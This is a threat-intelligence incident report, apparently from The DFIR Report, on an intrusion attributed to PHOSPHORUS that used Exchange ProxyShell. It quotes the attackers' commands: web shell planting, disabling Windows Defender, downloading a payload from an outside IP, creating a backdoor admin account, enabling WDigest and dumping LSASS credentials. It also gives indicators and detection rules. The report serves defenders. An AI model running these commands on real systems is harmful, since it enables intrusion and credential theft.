href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div><!-- .wrap --> </nav><!-- .secondary-navigation --> </div><!-- .main-header-brand --> </div><!-- .main-header --> </header><!-- #masthead --> <div id="content" class="site-content"> <div class="site-content-cell"> <div class="wrap wrap-width"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <article id="post-5981" class="post-5981 post type-post status-publish format-standard hentry category-exploit category-fast-reverse-proxy category-phosphorus category-proxyshell entry"> <div class="entry-content-holder"> <header class="entry-header"> <div class="entry-meta"> <span class="cat-links"> <a class="category-color-34" href="https://thedfirreport.com/category/exploit/">exploit</a> <a class="category-color-87" href="https://thedfirreport.com/category/fast-reverse-proxy/">Fast Reverse Proxy</a> <a class="category-color-104" href="https://thedfirreport.com/category/phosphorus/">PHOSPHORUS</a> <a class="category-color-88" href="https://thedfirreport.com/category/proxyshell/">ProxyShell</a> </span> </div><!-- .entry-meta --> <h1 class="entry-title">PHOSPHORUS Automates Initial Access Using ProxyShell</h1> <div class="entry-meta"> <span class="posted-on"><a href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" rel="bookmark"><time class="entry-date published" datetime="2022-03-21T01:55:06+00:00">March 21, 2022</time></a></span> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> 
<p>In December 2021, we observed an adversary exploiting the <a href="https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell" target="_blank" rel="noreferrer noopener">Microsoft Exchange ProxyShell vulnerabilities</a> to gain initial access and execute code via multiple web shells. The overlap of activities and tasks was remarkably similar to that observed in our previous report, “<a href="https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" target="_blank" rel="noreferrer noopener">Exchange Exploit Leads to Domain Wide Ransomware</a>”.</p> <p>In this intrusion, we observed the initial exploitation of the ProxyShell vulnerabilities followed by some further post-exploitation activity, which included web shells, credential dumping, and specialized payloads. We assess that this activity was related to <a href="https://attack.mitre.org/groups/G0059/" target="_blank" rel="noreferrer noopener">PHOSPHORUS</a> (aka UNC2448, NemesisKitten, and DEV-0270) due to the TTPs mirroring previously reported activity that was <a href="https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/" target="_blank" rel="noreferrer noopener">attributed to the group</a>.</p> <h2 class="wp-block-heading">Case Summary</h2> <p>The threat actors’ activity occurred in two bursts within a 3-day time frame. As with our previous case, they started by uploading their web shell and disabling antivirus services.</p> <p>Soon after, they established two persistence methods. The first was through scheduled tasks, and the second was via a newly created account. The account was then added to the “remote desktop users” and “local administrators users” groups. 
Like in the prior case involving ProxyShell, we observed a file masquerading as dllhost.exe that exhibited similarities to a proxy tool called <a href="https://github.com/fatedier/frp" target="_blank" rel="noreferrer noopener">Fast Reverse Proxy</a> (with modifications), downloaded from the same IP as observed in the prior case and connecting to suspect domains.</p> <p>After establishing alternative ways of re-entering the targeted host, they enumerated the environment using Windows native programs such as net and ipconfig. At the end of their first visit, they disabled LSA protection, enabled WDigest for access to plain text credentials later, dumped the LSASS process memory, and downloaded the results via the web shell. </p> <p>All of this activity occurred over a time frame of around 2 minutes, leading us to assess that the entire attack was likely scripted out. The user agent strings of python-requests/2.26.0 and python-urllib3/1.26.7 also point to the use of scripts.</p> <p>Two days later, we saw the threat actors reappear. We expected them to pick up where they left off; however, they repeated all previous actions. Due to the similarity between the commands and the sequential order in which they ran, this is additional evidence that the threat actors employed automated scripts to execute these activities.</p> <p>No further activity was observed as the threat actors were evicted from the network.</p> <h3 class="wp-block-heading">Services</h3> <p>We offer multiple services including a <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">Threat Feed service</a> which tracks Command and Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. 
More information on this service and others can be found <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">here</a>.</p> <p>We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our <a href="https://www.patreon.com/thedfirreport" target="_blank" rel="noreferrer noopener">Security Researcher and Organization</a> services.</p> <h2 class="wp-block-heading">Timeline</h2> <p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-6005" src="https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell.png" alt="" width="1080" height="1402" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell.png 1080w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-231x300.png 231w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-789x1024.png 789w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-768x997.png 768w" sizes="(max-width: 1080px) 100vw, 1080px" /></p> <p>Analysis and reporting completed by <a href="https://twitter.com/samaritan_o" target="_blank" rel="noreferrer noopener">@samaritan_o</a>, <a href="https://twitter.com/Kostastsale" target="_blank" rel="noreferrer noopener">@kostastsale</a>, <a href="https://twitter.com/svch0st" target="_blank" rel="noreferrer noopener">@svch0st</a> and <a href="https://twitter.com/RoxpinTeddy" target="_blank" rel="noreferrer noopener">@RoxpinTeddy</a>.</p> <h2 class="wp-block-heading">Initial Access</h2> <p>As similarly seen in our previous report <a href="https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" target="_blank" rel="noreferrer noopener">Exchange Exploit Leads to Domain Wide 
Ransomware</a>, this threat actor utilized the Microsoft Exchange ProxyShell vulnerabilities, an exploit chain of 3 different CVEs:</p> <ul class="wp-block-list"> <li>CVE-2021-34473</li> <li>CVE-2021-34523</li> <li>CVE-2021-31207</li> </ul> <p>With the appropriate <a href="https://www.mandiant.com/resources/greater-visibilityt" target="_blank" rel="noreferrer noopener">PowerShell logging</a> available, we were able to recover the PowerShell cmdlets executed on the Exchange server, which resulted in the creation of web shells on the host.</p> <p>Once the threat actor had gained a valid privileged session using CVE-2021-34473 and CVE-2021-34523, they then ensured the default Administrator account had the correct role for mailbox importing and exporting:</p> <pre class="wp-block-preformatted">New-ManagementRoleAssignment -Role "Mailbox Import Export" -User "administrator@&lt;REDACTED&gt;"</pre> <p>The threat actor initiated a mailbox export that matched the search criteria of <code>Subject -eq 'aspx_wkggiyvttmu'</code> to a provided location with the .aspx extension. While the file created is a legitimate .pst file, it contains plaintext web shell code that is rendered by IIS when requested.</p> <pre class="wp-block-preformatted">New-MailboxExportRequest -Mailbox "administrator@&lt;REDACTED&gt;" -FilePath "\\localhost\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\aspx_wkggiyvttmu.aspx" -IncludeFolders ("#Drafts#") -ContentFilter "Subject -eq 'aspx_wkggiyvttmu'" </pre> <p>In an attempt to hide the actions taken, the actor removes the request just created:</p> <pre class="wp-block-preformatted">Remove-MailboxExportRequest -Confirm "False" -Force "True" -Identity "77a883a7-470c-471c-a193-f4c54f263fde"</pre> <p>This activity then repeated approximately 2 days after the initial exploitation. As the actor had already achieved remote execution by this point, there is a high likelihood that the exploitation of Exchange servers is automated. 
Below is the second web shell created, which shares the same naming convention as the first.</p> <pre class="wp-block-preformatted">New-MailboxExportRequest -Mailbox "administrator@&lt;REDACTED&gt;" -FilePath "\\localhost\c$\inetpub\wwwroot\aspnet_client\system_web\aspx_dyukbdcxjfi.aspx" -IncludeFolders ("#Drafts#") -ContentFilter "Subject -eq 'aspx_dyukbdcxjfi'"</pre> <p><img decoding="async" class="alignnone size-full wp-image-6007" src="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png" alt="" width="1673" height="1447" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png 1673w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-300x259.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-1024x886.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-768x664.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-1536x1329.png 1536w" sizes="(max-width: 1673px) 100vw, 1673px" /></p> <h2>Execution</h2> <p>Approximately 20 seconds after the web shell <code>aspx_wkggiyvttmu.aspx</code> was created, a flurry of POST requests were sent to the web shell.</p> <p>The web shell followed a similar structure seen in previous cases. At least two parameters are sent in the POST request to the web shell: <code>delimiter</code>, which defines what string is used to separate the response, and <code>exec_code</code>, which is the command to be run. 
The web shell had predefined functions for special actions:</p> <ul class="wp-block-list"> <li><code>get</code> – Get file from location on disk (additional <code>dst</code> POST parameter)</li> <li><code>put</code> – Upload file to location (additional <code>dst</code> POST parameter)</li> <li><code>run</code> – Execute a list of commands separated by “;” using PowerShell.</li> </ul> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png"><img decoding="async" class="aligncenter size-full wp-image-5992" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png" alt="" width="1497" height="819" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png 1497w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-300x164.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-1024x560.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-768x420.png 768w" sizes="(max-width: 1497px) 100vw, 1497px" /></a></figure> <p>If <code>exec_code</code> does not start with one of the above commands, it will simply attempt to run it with PowerShell.</p> <p>The environment for this investigation had SSL inspection and PCAPs available for analysis which allowed us to see the commands being sent to the web shell itself. 
Below you can see an example of commands that were sent and the outputs they returned in the response.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5993" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png" alt="" width="1600" height="503" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png 1600w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-300x94.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-1024x322.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-768x241.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-1536x483.png 1536w" sizes="auto, (max-width: 1600px) 100vw, 1600px" /></a></figure> <p>The actor first uploaded a file <code>Wininet.xml</code>, which is later used to create a scheduled task, to <code>C:\windows\temp</code> using the <code>put</code> command of the web shell. 
This was followed shortly by several commands to impair Windows Defender before downloading and executing a fake <code>dllhost.exe</code> from 148.251.71[.]182.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5994" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png" alt="" width="1871" height="83" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png 1871w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-300x13.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-1024x45.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-768x34.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-1536x68.png 1536w" sizes="auto, (max-width: 1871px) 100vw, 1871px" /></a></figure> <p>Scheduled Task Commands:</p> <pre class="wp-block-preformatted">schtasks.exe /Create /F /XML C:\windows\temp\Wininet.xml /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <pre class="wp-block-preformatted">schtasks.exe /Run /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <p>Defender Modification Command:</p> <pre class="wp-block-preformatted">try {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -AsJob; Set-MpPreference -DisableRealtimeMonitoring 1 -AsJob; Add-MpPreference -ExclusionPath 'C:\Windows' -Force -AsJob} catch {}</pre> <pre class="wp-block-preformatted">Start-Process powershell.exe {$file='c:\windows\dllhost.exe'; Invoke-WebRequest -Uri 'hXXp://148.251.71[.]182/update[.]tmp' -OutFile $file} </pre> <p>The scheduled task runs a batch script called <code>Wininet.bat</code>, which was also uploaded through the web shell. 
<code>Wininet.bat</code> simply loops through the execution of the file <code>dllhost.exe</code>.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5995" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png" alt="" width="381" height="120" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png 381w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-05-300x94.png 300w" sizes="auto, (max-width: 381px) 100vw, 381px" /></a></figure> <p>The file <code>dllhost.exe</code> is a golang binary. When executed, the binary was observed resolving the following domains:</p> <ul class="wp-block-list"> <li>api.myip[.]com (for discovery)</li> <li>tcp443.msupdate[.]us</li> <li>kcp53.msupdate[.]us</li> </ul> <p>The binary also spawns the following commands when executed:</p> <ul class="wp-block-list"> <li>cmd /c wmic computersystem get domain</li> <li>powershell /c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders</li> </ul> <p>The <a href="https://www.virustotal.com/gui/file/1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e/community" target="_blank" rel="noreferrer noopener">binary</a> has a low confidence reference to FRP (<a href="https://github.com/fatedier/frp" target="_blank" rel="noreferrer noopener">FastReverseProxy</a>) as the sample matches the closed source Yara rule – <a href="https://valhalla.nextron-systems.com/info/rule/HKTL_PUA_FRP_FastReverseProxy_Oct21_1" target="_blank" rel="noreferrer noopener">HKTL_PUA_FRP_FastReverseProxy_Oct21_1</a> (by Florian Roth) however it does not behave in the same way as the open source tool. 
This file also matches on an additional Yara rule more recently – <a href="https://valhalla.nextron-systems.com/info/rule/APT_MAL_Go_FRP_CharmingKitten_Jan22_1" target="_blank" rel="noreferrer noopener">APT_MAL_Go_FRP_CharmingKitten_Jan22_1</a> pointing to the file including some code from FRP but otherwise having been modified for use by this threat actor.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-6008" src="https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution.png" alt="" width="1427" height="511" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution.png 1427w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-300x107.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-1024x367.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-768x275.png 768w" sizes="auto, (max-width: 1427px) 100vw, 1427px" /></p> <h2 class="wp-block-heading">Persistence</h2> <p>The threat actor utilized both account creation and scheduled tasks to gain persistence in the environment.</p> <p><strong>New account creation</strong></p> <p>During the first activity, we observed the use of <code>user.exe</code> executable that ran the following PowerShell command:</p> <pre class="wp-block-preformatted">powershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount </pre> <p>The first thing they did was make a new user named <code>DefaultAccount</code> with the password <code>P@ssw0rd123412</code>. They then activated the account and changed the password (<code>P@ssw0rd12341234</code>) for the second time. 
Finally, the commands added the new account to the Administrators group and Remote Desktop Users group.</p> <p>The threat actors ran the same command again two days later:</p> <pre class="wp-block-preformatted">powershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount </pre> <p>Due to the close proximity between executed commands, we assess that the threat actors used tools to automate the execution and discovery phases of this attack.</p> <p><strong>Scheduled task</strong></p> <p>As previously noted, we discovered the creation of a scheduled task from a .xml template that was copied to the server via the web shell.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5996" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png" alt="" width="646" height="382" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png 646w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-06-300x177.png 300w" sizes="auto, (max-width: 646px) 100vw, 646px" /></a></figure> <p>Below, we can observe the content of <strong>wininet.xml</strong>:</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5998" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png" alt="" width="747" height="899" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png 747w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5-249x300.png 249w" sizes="auto, (max-width: 747px) 100vw, 747px" /></a></figure> <p>The following commands were then run to initiate the task and to achieve 
persistence:</p> <pre class="wp-block-preformatted">schtasks.exe /Create /F /XML %wintmp%\Wininet.xml /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <pre class="wp-block-preformatted">schtasks.exe /Run /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <h2 class="wp-block-heading">Privilege Escalation</h2> <p>The scheduled task created by the web shell was set to use the principal SID “S-1-5-18”, or SYSTEM.</p> <pre class="wp-block-preformatted">&lt;UserId&gt;S-1-5-18&lt;/UserId&gt;</pre> <h2>Defense Evasion</h2> <p>Using PowerShell, the threat actors issued several commands to impair Windows Defender, including:</p> <ul class="wp-block-list"> <li>Windows Defender Behavior Monitoring was disabled.</li> <li>The Severe Threat default action was set to ‘Allow’.</li> <li>Realtime Monitoring was disabled.</li> <li>The ‘C:\Windows’ path was excluded from scheduled and real-time scanning.</li> </ul> <pre class="wp-block-preformatted">try {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -AsJob; Set-MpPreference -DisableRealtimeMonitoring 1 -AsJob; Add-MpPreference -ExclusionPath 'C:\Windows' -Force -AsJob} catch {}</pre> <p>A rule was added to the Windows Firewall to allow inbound RDP traffic.</p> <pre class="wp-block-preformatted">"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389</pre> <p>Remote Desktop Services was started.</p> <pre class="wp-block-preformatted">"net" start TermService</pre> <p>The threat actor enabled WDigest authentication. 
This forces credentials from future logons to be stored in plaintext.</p> <pre class="wp-block-preformatted">"reg" add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</pre> <p>LSA protection was disabled.</p> <pre class="wp-block-preformatted">"reg" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f</pre> <h2 class="wp-block-heading">Credential Access</h2> <p>The threat actor created a process memory dump from LSASS.exe. In this case, they created a “minidump” using the LOLBIN <a href="https://lolbas-project.github.io/lolbas/Libraries/comsvcs/" target="_blank" rel="noreferrer noopener">comsvcs.dll</a>. This was dropped to disk as ssasl.pmd (lsass.dmp reversed) and then zipped before exfiltration.</p> <pre class="wp-block-preformatted">"powershell.exe" /c Remove-Item -Path C:\windows\temp\ssasl.pmd -Force -ErrorAction Ignore; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id C:\windows\temp\ssasl.pmd full | out-host; Compress-Archive C:\windows\temp\ssasl.pmd C:\windows\temp\ssasl.zip</pre> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-6003" src="https://thedfirreport.com/wp-content/uploads/2022/03/1.png" alt="" width="932" height="227" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/1.png 932w, https://thedfirreport.com/wp-content/uploads/2022/03/1-300x73.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/1-768x187.png 768w" sizes="auto, (max-width: 932px) 100vw, 932px" /></p> <h2>Discovery</h2> <p>The threat actors used native Windows binaries to enumerate the exploited server in an automated fashion. 
They executed commands such as:</p> <pre class="wp-block-preformatted">net.exe user</pre> <pre class="wp-block-preformatted">ipconfig.exe /all</pre> <pre class="wp-block-preformatted">powershell.exe (multiple commands)</pre> <pre class="wp-block-preformatted">quser.exe</pre> <p>These discovery tasks, like the rest of the activity observed from this threat actor, were executed via the web shell.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5997" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png" alt="" width="1682" height="302" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png 1682w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-300x54.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-1024x184.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-768x138.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-1536x276.png 1536w" sizes="auto, (max-width: 1682px) 100vw, 1682px" /></a></figure> <p>They used the PowerShell cmdlet Get-WmiObject to collect the name and IP address of the domain controller.</p> <pre class="wp-block-preformatted">Get-WMIObject Win32_NTDomain | findstr DomainController</pre> <p>Additionally, we saw the threat actors retrieving an email address from the compromised Exchange server using the below command. This was likely done as a test. 
</p> <pre class="wp-block-preformatted">Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"</pre> <h2 class="wp-block-heading">Collection</h2> <p>While the threat actor had access to the Exchange server, we observed no attempts to export or access user mailboxes.</p> <h2 class="wp-block-heading">Command and Control</h2> <p>As we saw in the Execution section, <code>dllhost.exe</code> was used to access the below domains for C2, which we believe was using a variation of FRP.</p> <ul> <li>tcp443.msupdate[.]us (107.173.231[.]114)</li> <li>kcp53.msupdate[.]us (107.173.231[.]114)</li> </ul> <p>This C2 channel was not used very much, as most activity was done through the web shell.</p> <h2 class="wp-block-heading">Exfiltration</h2> <p>The only data successfully exfiltrated from the environment was the archive containing the LSASS dump.</p> <p>Here you can see the threat actor using the web shell command to extract it: </p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6000" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png" alt="" width="909" height="572" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png 909w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-09-300x189.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-09-768x483.png 768w" sizes="auto, (max-width: 909px) 100vw, 909px" /></a></figure> <h2 class="wp-block-heading">Impact</h2> <p>In this case, there was no further impact to the environment before the threat actors were evicted. 
<span style="color: #000000;">Due to our previous report and OSINT research we believe</span> with medium to high confidence that this intrusion would have ended in ransomware.</p> <h2 class="wp-block-heading"><strong>Indicators</strong></h2> <p>All artifacts including web shells, files, IPs, etc. were added to our <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">services</a> in December.</p> <h3 class="wp-block-heading">Network</h3> <pre>ipv4:148.251.71[.]182<br />ipv4:107.173.231[.]114<br />domain: tcp443.msupdate[.]us<br />domain: kcp53.msupdate[.]us<br />useragent:python-urllib3/1.26.7<br />useragent:python-requests/2.26.0</pre> <h3 class="wp-block-heading">File</h3> <pre>aspx_dyukbdcxjfi.aspx<br />1a5ad24a6880eea807078375d6461f58<br />da2470c3990ea0862a79149c6036388498da83cd<br />84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7<br /><br />dhvqx.aspx<br />b2fde6dc7bd1e04ce601f57805de415b<br />4d243969b54b9b80c1d26e0801a6e7e46d2ef03e<br />c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8<br /><br />dllhost.exe<br />9a3703f9c532ae2ec3025840fa449d4e<br />8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee<br />1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e<br /><br />wininet.bat<br />5f098b55f94f5a448ca28904a57c0e58<br />27102b416ef5df186bd8b35190c2a4cc4e2fbf37<br />668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0<br /><br />wininet.xml<br />d2f4647a3749d30a35d5a8faff41765e<br />0f676bc786db3c44cac4d2d22070fb514b4cb64c<br />559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e<br /><br />user.exe<br />f0be699c8aafc41b25a8fc0974cc4582<br />6bae2d45bbd8c4b0a59ba08892692fe86e596154<br />7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b<br /><br />task_update.exe<br />cacb64bdf648444e66c82f5ce61caf4b<br />3a6431169073d61748829c31a9da29123dd61da8<br />12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075f</pre> <h2 
class="wp-block-heading">Detections</h2> <h3>Network</h3> <pre>ET INFO User-Agent (python-requests) Inbound to Webserver<br />ET INFO Generic HTTP EXE Upload Inbound<br />ET INFO Generic HTTP EXE Upload Outbound<br />GPL ATTACK_RESPONSE command completed<br />ET ATTACK_RESPONSE Net User Command Response<br />ET WEB_SERVER WebShell Generic - netsh firewall</pre> <h3 class="wp-block-heading">Sigma</h3> <p>Custom rules</p> <p>Exchange Webshell creation – <a href="https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation" target="_blank" rel="noopener">https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation</a></p> <p>DefaultAccount Usage – <a href="https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage" target="_blank" rel="noopener">https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage</a></p> <p>SigmaHQ rules</p> <p>Local Accounts Discovery – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_account_discovery.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_account_discovery.yml</a></p> <p>Lsass Memory Dump via Comsvcs DLL – <a href="https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml</a></p> <p>Net.exe Execution – <a href="https://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml" target="_blank" rel="noreferrer 
noopener">https://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml</a></p> <p>Net-exe User Account Creation – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml</a></p> <p>Netsh Port or Application Allowed – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_fw_add.yml</a></p> <p>Netsh RDP Port Opening – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_netsh_allow_port_rdp.yml</a></p> <p>Non Interactive PowerShell – <a href="https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml</a></p> <p>Powershell Defender Exclusion – <a href="https://github.com/SigmaHQ/sigma/blob/682e0458a336c3a6e93b18f7e972e1d67ef01598/rules/windows/process_creation/win_powershell_defender_exclusion.yml" target="_blank" rel="noreferrer 
